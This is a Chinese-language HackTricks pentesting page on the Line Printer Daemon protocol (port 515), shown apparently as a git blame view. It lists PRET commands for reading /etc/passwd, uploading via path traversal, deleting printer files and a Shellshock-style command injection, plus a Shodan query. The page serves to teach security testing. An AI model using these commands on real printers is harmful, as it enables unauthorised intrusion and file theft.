hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

58 lines
3.8 KiB
Markdown
Raw Normal View History

{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>支持 HackTricks</summary>
2022-04-28 16:01:33 +00:00
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}
2022-04-28 16:01:33 +00:00
### **LPD 协议简介**
2022-04-28 16:01:33 +00:00
在1980年代**行打印守护进程 (LPD) 协议**在伯克利 Unix 中开发,后来通过 RFC1179 正式化。该协议通过 515/tcp 端口运行,允许通过 `lpr` 命令进行交互。通过 LPD 打印的本质涉及发送一个 **控制文件**(以指定作业细节和用户)以及一个 **数据文件**(包含打印信息)。虽然控制文件允许选择 **各种文件格式** 作为数据文件,但这些文件的处理由特定的 LPD 实现决定。一个广泛认可的 Unix 类系统实现是 **LPRng**。值得注意的是LPD 协议可以被利用来执行 **恶意 PostScript****PJL 打印作业**
### **与 LPD 打印机交互的工具**
[**PRET**](https://github.com/RUB-NDS/PRET) 引入了两个基本工具,`lpdprint` 和 `lpdtest`,提供了一种与 LPD 兼容打印机交互的简单方法。这些工具使得从打印数据到操纵打印机上的文件(如下载、上传或删除)的一系列操作成为可能:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname mail lpdtest@mailhost.local
```
对于有兴趣进一步探索**打印机黑客**领域的个人,可以在这里找到全面的资源:[**黑客打印机**](http://hacking-printers.net/wiki/index.php/Main_Page)。
2022-05-01 12:49:36 +00:00
# Shodan
2020-10-05 17:40:56 +00:00
* `port 515`
2022-04-28 16:01:33 +00:00
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>支持 HackTricks</summary>
2022-04-28 16:01:33 +00:00
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}